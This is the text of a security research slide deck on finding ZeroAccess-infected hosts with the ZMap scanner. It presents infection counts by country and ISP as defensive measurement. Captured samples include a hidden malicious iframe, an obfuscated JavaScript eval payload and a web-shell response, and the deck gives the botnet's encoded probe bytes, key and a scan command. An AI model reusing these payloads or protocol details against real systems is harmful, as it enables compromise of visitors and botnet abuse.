hunting botnets with zmap

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.

Hunting Botnets with ZMapRicky Lawshae / 21 March 2014

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.2

Who am I?

• Security Researcher at HP TippingPoint DVLabs

• At Rapid7 before that, and BreakingPoint before that…been doing this for a while now

• Specialize in network protocol analysis

• Breaker of things/voider of warranties


What is the internet?


The State of Scanning

• Internet Census 2012– Researcher compromised more than 400k devices– Created the Carna Botnet – Started sending various probes to every machine on the internet– Published the scan data

• Critical.io– Same idea of scanning the whole internet– Instead of having a 400k botnet, it was just HD Moore doing it himself– Data was not public at the time



• Do-it-yourself– Growing number of internet-scale scanning tools (ZMap, Masscan, etc)– Arms race of sorts to see who can scan /0 the fastest

• “Scan the entire internet in X minutes!”

• ZMap– Created by a team at University of Michigan– Open-source (https://github.com/zmap/zmap)– Easy to use

• zmap -M udp -p [port] -B 400M --probe-args=file:[payload_file]

https://github.com/zmap/zmap

https://github.com/zmap/zmap



• Project Sonar– Started by Rapid7 in 2013– Community-driven scan data collection– Utilizes many different scan methods– Publicly available (https://scans.io/)

https://scans.io/

https://scans.io/

https://scans.io/



• Get a better idea of what the internet is

• Take a proactive approach to difficult problems– Such as…


Malware

• Largely unquantified problem– At least, not efficiently or accurately– Assume it’s bad, we just don’t know exactly how bad

• The current approach– Passive monitoring of “sensors”– Hits on IDS devices, etc– Extrapolate infection numbers from sample sets

• A new approach– Use internet scanning (ie ZMap) to look for compromised/malicious hosts– They tell you right then if they’re infected or not


Using the Data We Have

• Searching through existing scan data shows a lot of awful out there– Exploit kit landing pages– Malicious javascript– Shells!

Using the Data We Have[110.137.80.152]

HTTP/1.1 200 OKDate: Fri, 14 Dec 2012 09:07:26 GMTServer: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0Accept-Ranges: bytesContent-Length: 312Connection: closeContent-Type: text/html

<html><head><meta name="author" content="Kai Oswald Seidler"><meta http-equiv="refresh" content="0;url=/xampp/"></head><body bgcolor=#ffffff><iframe frameborder=0 height=1 width=1 scrolling=no src='http://gabranits.com/main.php?page=85deef298b2e1e90'> </iframe></body></html>

HTTP/1.1 200 OKDate: Sat, 15 Dec 2012 20:20:49 GMTServer: ApacheLast-Modified: Sat, 15 Dec 2012 07:43:52 GMTAccept-Ranges: bytesContent-Length: 2685Connection: closeContent-Type: text/html

<html><body bgcolor="#000000"><script type="text/javascript" language="javascript" > try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{window.document.body++}catch(gdsgsdg){dbshre=82;}}}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,98,112,97,106,102,27,52,24,93,105,94,108,101,94,104,111,37,91,107,95,92,107,93,62,102,96,100,93,103,110,35,30,97,95,108,92,100,93,32,35,54,4,2,25,26,27,23,95,114,99,108,99,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,111,94,91,109,90,96,98,110,96,90,108,108,40,105,99,39,98,103,92,94,93,108,41,94,99,97,100,40,107,95,104,32,53,8,1,24,25,26,27,94,113,98,107,103,37,107,109,115,103,92,38,105,105,110,96,108,98,105,105,23,53,25,33,92,89,10



(root@web21:/)\n/bin/sh: line 1: GET: command not found\n/bin/sh: line 2: \r: command not found\n


Using the Data We Have

• Good to know, but we want to go deeper

• Sending generic requests won’t work for everything– UDP services only respond to requests they recognize– Targeted malware scanning would get better results faster

• Time to do our own scan!


Scanning for Botnets

• A step-by-step guide– Write a ZMap probe that elicits a response from infected hosts and/or C&C servers– Find some bandwidth

• Dedicated servers with fat, unmetered pipes work nicely• My current setup has a 500Mbps unlimited line and a TB of storage

– Send your probe to the entire internet– Examine the responses

• Remove any false positives you got back• You can automate most of this if you know what you’re looking for

– Respond to abuse complaints


Scanning for Botnets

• What makes a good target– UDP is easier than TCP

• Less overhead• Less risk of false positive (well…we’ll get to that)

– Small range of listening ports• Zeus picks randomly from a 10000 port range…It adds up quick

• What doesn’t make a good target– Malware that communicates over HTTP

• Lots of results == lots of post-processing• ZMap doesn’t handle this well


Proof of Concept


Proof of Concept: Zero Access

• Botnet used mostly for click-fraud, some bitcoin mining

• Been in the news a lot lately– Microsoft take-down attempt on Dec 5th

– And Symantec last Sept

• P2P botnet where all infected hosts can talk to each other– “Super peers” are internet-facing machines– Hard to track down actual C&C servers, since control is decentralized– Hard to completely shut down



• It makes a good proof of concept for many reasons– Bot communication over both TCP and UDP– Small command payloads

• 16 bytes for the one I used– Small range of hardcoded ports

• 16461, 16464, 16465, 16470, 16471– Known to be currently active

• Bound to get at least some results



• GetL command– Get list of peers that an infected host is able to communicate with– 16 byte payload

• 4 byte CRC checksum• 4 byte command string (“getL”)• 4 byte unknown (Sequence number or packet ID? Anyways, it’s 0)• 4 byte unique ID

– Gets “encrypted” using a ROL/XOR algorithm• 4 byte key ^ 1st 4 bytes of data• Rotate key bits left one place, and XOR rotated key with next 4 data bytes• Repeat

– Hardcoded key == “ftp2”



\xE7\x98\xED\x03\x28\x94\x8D\xAB\xC9\xC0\xD1\x99\x13\xC3\xC6\xF9


Sweet, sweet data


Infection by the Numbers

• Scan date: 4 December 2013

• Scan duration: 15 hours

• Total unique hosts found: 10500

• Infected hosts (by port)– 16461: 239– 16464: 3503– 16465: 1285– 16470: 2192– 16471: 4230

• Scan date: 24 January 2014

• Scan duration: 15 hours

• Total unique hosts found: 7873

• Infected hosts (by port)– 16461: 176– 16464: 3732– 16465: 1238– 16470: 1798– 16471: 2713


Second Scan by Country

• Infection found across 109 countries

• US accounts for 34% of infected hosts– Seems like a lot until you realize that

US owns 34% of all IPv4 addresses[1]

• Japan is distant 2nd at 9%

• Switzerland has 5 (~0.065%)

• Venezuela seems a little high…

[1] http://www.ip2location.com/reports/internet-ip-address-2012-report

http://www.ip2location.com/reports/internet-ip-address-2012-report

http://www.ip2location.com/reports/internet-ip-address-2012-report


A quick aside to discuss a couple of anomalies


Where is China?

• 56th place in the list of infected countries– 11 infected hosts– 0.1% of total

• Consensus is that this is probably Great Firewall of China related

• If we count Hong Kong as part of China, the number goes up quite a bit– Hong Kong had 54 infected (about 5 times more than all of China)– Bumps China up to almost 1%!


The Curious Case of Israel

• Before removing false positives, Israel showed WAY higher than expected infected hosts– 3372 “infected” in first scan (23% of total). Was it being targeted?– Only 80 of those were legitimate results

• Examining the false positives among the Israeli IP addresses showed most were HTTP responses

• Turns out http://internet-rimon.com/ (major Israeli ISP) does some intense nanny filtering

HTTP/1.0 200 OK Connection: keep-alive Rimon: RWC_BLOCK Content-type: text/html Refresh: 15 Date: Wed, 04 Dec 2013 06:31:28 GMT Expire: Mon, 02 Dec 2013 21:11:28 Pragma: no-cache Cache-Control: no-cache Server: lighttpd/1.4.19 Content-Length: 103 <html><head></head><body><center><b>You are not recognized in the system !!!</b></center></body></html>

http://internet-rimon.com/

http://internet-rimon.com/


Back to the Data


Trouble in South America?

Everywhere else is getting better, but S. America seems to be getting much worse (CL +21, AR +61, VE +80, etc). Politics? Impending World Cup? Impossible to guess. May even be coincidence.


Second Scan by ISP

• No big surprises here– Most ISP’s in top 10 are based in

countries in top 10– Though the order is somewhat

interesting

• Should be noted that Microsoft still has 16 infected hosts out there…– Funny in light of the fact that they were

going so hard against Zero Access recently

• Couple from Amazon, godaddy, etc

T o p 1 0 I n f e c t e d I S P s I S P

725

470

254

228

205

196

172

140

130

91

Comcast Cable Time Warner Charter Comm RCS & RDSChunghwa CanTV Cox Comm Optimum OnlineOpen Comp Net Telecom Italia


The Takeaway


What We Learned

• It works!– Well…for specific types of malware– Stronger and weaker than old approach in certain aspects– Only get part of the picture– Feasibility of HTTP-based C&C hunting has yet to be determined

• Zero Access is still rampant– Dumb guess at number of peers based only on super-peers means as much as 2

million infected– Reality is probably lower, could decode responses to find out…

• China and Israel both have pretty good firewalls apparently


Where do we go next?

• Decode responses I got from this scan to pull out peer lists– Get a more complete picture of the infection– Though just knowing all the super-peers is still very useful

• Going after C&C– Currently assessing potential targets– Would like to avoid having to process HTTP responses

• Get a regularly scheduled cycle of scans going– More probes!– Could have monthly or even weekly updates on multiple botnets


What else could you do with this?

• Track infection rates over time– More data points == better conclusions– See if it’s getting better or worse– Watch the distribution to other countries

• Watch take-down attempts as they happen– Measure effectiveness

• Scan your own internal networks– Can scan an entire class A in minutes– You should already be scanning your own networks anyway


References

https://zmap.io/ [ZMap open-source scanner project]

http://en.wikipedia.org/wiki/ZeroAccess_botnet [Zero Access entry on Wikipedia]

https://twitter.com/HeadlessZeke [I rarely say anything valuable, but I am responsive]

[email protected]

https://zmap.io/

https://zmap.io/

http://en.wikipedia.org/wiki/ZeroAccess_botnet

http://en.wikipedia.org/wiki/ZeroAccess_botnet

https://twitter.com/HeadlessZeke

https://twitter.com/HeadlessZeke


Thank you

hunting botnets with zmap

Technology